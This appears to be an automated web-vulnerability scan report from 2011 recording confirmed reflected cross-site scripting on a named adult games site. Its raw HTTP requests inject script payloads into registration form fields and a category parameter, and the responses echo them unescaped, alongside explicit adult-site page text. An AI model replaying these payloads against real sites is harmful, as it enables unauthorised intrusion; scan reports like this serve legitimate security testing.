<option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <o..
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST '"--></style></script><script>alert(0x00038F)</script>
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038F)%3c%2fscript%3e&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4656
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.flashforadults.com/?t=110138,1,66,0" target = "_blank"><img src="lopsalesforce/vert_ffa.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00038F)</script>"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <..
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST 3
emailx POST '"--></style></script><script>alert(0x000390)</script>
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 165
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x=3&emailx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000390)%3c%2fscript%3e&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4639
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.sextronix.com/hit/144/110138/1/1/default/" target = "_blank"><img src="lopsalesforce/vert_3dbg.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Username already used<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x000390)</script>"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <option value="US">United States&l..
- /games_dev.php

/games_dev.php

http://www.lessonofpassion.com/games_dev.php?type=category&category='%22--%3E%3C/style%3E%3C/script%..

Parameters

Parameter Type Value
type GET category
category GET '"--></style></script><script>alert(0x000103)</script>

Request

GET /games_dev.php?type=category&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000103)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2174
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x000103)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big"> games</div> <center><div class="clearfix"> </div><center> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = 